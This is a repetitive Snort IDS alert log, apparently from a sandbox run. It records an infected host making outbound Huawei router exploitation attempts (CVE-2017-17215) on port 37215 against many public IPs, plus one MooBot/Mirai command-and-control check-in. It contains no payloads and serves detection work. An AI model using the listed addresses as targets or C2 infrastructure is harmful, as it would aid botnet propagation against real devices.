                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45064 -> 157.245.170.177:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45064 -> 157.245.170.177:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45174 -> 41.39.125.117:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45174 -> 41.39.125.117:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56780 -> 161.63.179.218:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56780 -> 161.63.179.218:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40466 -> 41.130.171.186:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40466 -> 41.130.171.186:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38606 -> 169.197.138.73:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38606 -> 169.197.138.73:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40688 -> 197.46.180.51:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40688 -> 197.46.180.51:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58066 -> 94.217.166.241:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58066 -> 94.217.166.241:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35038 -> 157.235.64.186:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35038 -> 157.235.64.186:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36232 -> 197.171.96.208:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36232 -> 197.171.96.208:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49834 -> 157.183.238.141:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49834 -> 157.183.238.141:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49858 -> 197.180.218.27:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49858 -> 197.180.218.27:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53054 -> 197.240.121.173:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53054 -> 197.240.121.173:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45176 -> 27.172.132.240:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45176 -> 27.172.132.240:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58932 -> 41.243.21.240:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58932 -> 41.243.21.240:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39872 -> 197.43.34.45:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39872 -> 197.43.34.45:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51698 -> 41.141.44.163:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51698 -> 41.141.44.163:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59074 -> 41.27.41.0:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59074 -> 41.27.41.0:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46134 -> 157.54.56.183:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46134 -> 157.54.56.183:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44158 -> 128.226.231.100:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44158 -> 128.226.231.100:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51088 -> 109.155.237.213:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51088 -> 109.155.237.213:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52008 -> 41.215.165.75:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52008 -> 41.215.165.75:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35284 -> 27.225.250.176:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35284 -> 27.225.250.176:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42382 -> 39.151.86.159:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42382 -> 39.151.86.159:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56698 -> 157.3.167.49:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56698 -> 157.3.167.49:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36430 -> 208.209.41.181:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36430 -> 208.209.41.181:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55678 -> 197.16.62.176:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55678 -> 197.16.62.176:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54580 -> 157.29.250.72:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54580 -> 157.29.250.72:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58204 -> 41.172.227.85:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58204 -> 41.172.227.85:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49630 -> 157.153.65.209:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49630 -> 157.153.65.209:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58860 -> 197.112.122.70:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58860 -> 197.112.122.70:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59372 -> 157.124.117.95:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59372 -> 157.124.117.95:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44076 -> 157.216.87.9:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44076 -> 157.216.87.9:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36830 -> 197.63.156.101:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36830 -> 197.63.156.101:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50004 -> 197.128.51.162:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50004 -> 197.128.51.162:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44232 -> 41.88.241.108:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44232 -> 41.88.241.108:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54280 -> 41.162.87.60:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54280 -> 41.162.87.60:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53518 -> 197.165.124.176:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53518 -> 197.165.124.176:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49648 -> 197.217.95.61:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49648 -> 197.217.95.61:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48442 -> 41.91.11.141:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48442 -> 41.91.11.141:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48170 -> 207.14.151.95:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48170 -> 207.14.151.95:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48888 -> 197.58.206.150:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48888 -> 197.58.206.150:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46772 -> 41.87.72.223:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46772 -> 41.87.72.223:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35196 -> 41.170.174.175:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35196 -> 41.170.174.175:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52488 -> 197.22.161.212:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52488 -> 197.22.161.212:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37642 -> 41.169.22.24:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37642 -> 41.169.22.24:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35798 -> 169.43.97.19:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35798 -> 169.43.97.19:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57342 -> 41.48.166.144:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57342 -> 41.48.166.144:37215
                  Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:52054 -> 103.177.35.32:19990
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41374 -> 41.148.56.11:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41374 -> 41.148.56.11:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60390 -> 41.4.165.175:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60390 -> 41.4.165.175:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55164 -> 41.203.106.92:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55164 -> 41.203.106.92:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41282 -> 41.45.139.167:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41282 -> 41.45.139.167:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32942 -> 113.60.169.38:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:32942 -> 113.60.169.38:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57916 -> 41.222.85.2:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57916 -> 41.222.85.2:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44960 -> 157.183.231.200:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44960 -> 157.183.231.200:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51646 -> 157.66.81.239:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51646 -> 157.66.81.239:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45362 -> 157.141.43.186:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45362 -> 157.141.43.186:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59652 -> 41.44.50.244:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59652 -> 41.44.50.244:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55268 -> 41.199.197.52:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55268 -> 41.199.197.52:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57032 -> 197.255.159.181:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57032 -> 197.255.159.181:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36652 -> 41.148.161.82:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36652 -> 41.148.161.82:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39368 -> 197.114.242.255:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39368 -> 197.114.242.255:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39820 -> 41.35.163.16:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39820 -> 41.35.163.16:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39058 -> 41.207.168.169:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39058 -> 41.207.168.169:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52068 -> 197.50.150.111:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52068 -> 197.50.150.111:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48996 -> 41.183.238.192:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48996 -> 41.183.238.192:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36634 -> 85.214.81.99:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36634 -> 85.214.81.99:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57896 -> 197.166.232.193:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57896 -> 197.166.232.193:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41768 -> 197.219.94.15:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41768 -> 197.219.94.15:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42668 -> 20.13.73.60:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42668 -> 20.13.73.60:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37504 -> 157.192.249.69:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37504 -> 157.192.249.69:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38644 -> 197.19.227.185:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38644 -> 197.19.227.185:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59670 -> 197.104.104.36:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59670 -> 197.104.104.36:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47146 -> 157.74.235.233:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47146 -> 157.74.235.233:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56338 -> 181.128.218.59:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56338 -> 181.128.218.59:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41772 -> 221.116.253.217:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41772 -> 221.116.253.217:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53486 -> 101.68.94.231:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53486 -> 101.68.94.231:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49200 -> 157.184.121.254:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49200 -> 157.184.121.254:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57704 -> 41.51.244.98:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57704 -> 41.51.244.98:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33416 -> 76.67.19.72:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33416 -> 76.67.19.72:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50438 -> 25.148.131.32:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50438 -> 25.148.131.32:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46066 -> 41.212.203.241:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46066 -> 41.212.203.241:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53408 -> 41.222.94.64:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53408 -> 41.222.94.64:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52390 -> 157.206.146.25:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52390 -> 157.206.146.25:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54564 -> 197.0.184.106:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54564 -> 197.0.184.106:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38324 -> 197.90.38.247:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38324 -> 197.90.38.247:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38690 -> 197.220.52.248:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38690 -> 197.220.52.248:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44116 -> 124.121.231.129:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44116 -> 124.121.231.129:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33708 -> 41.6.65.88:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33708 -> 41.6.65.88:37215
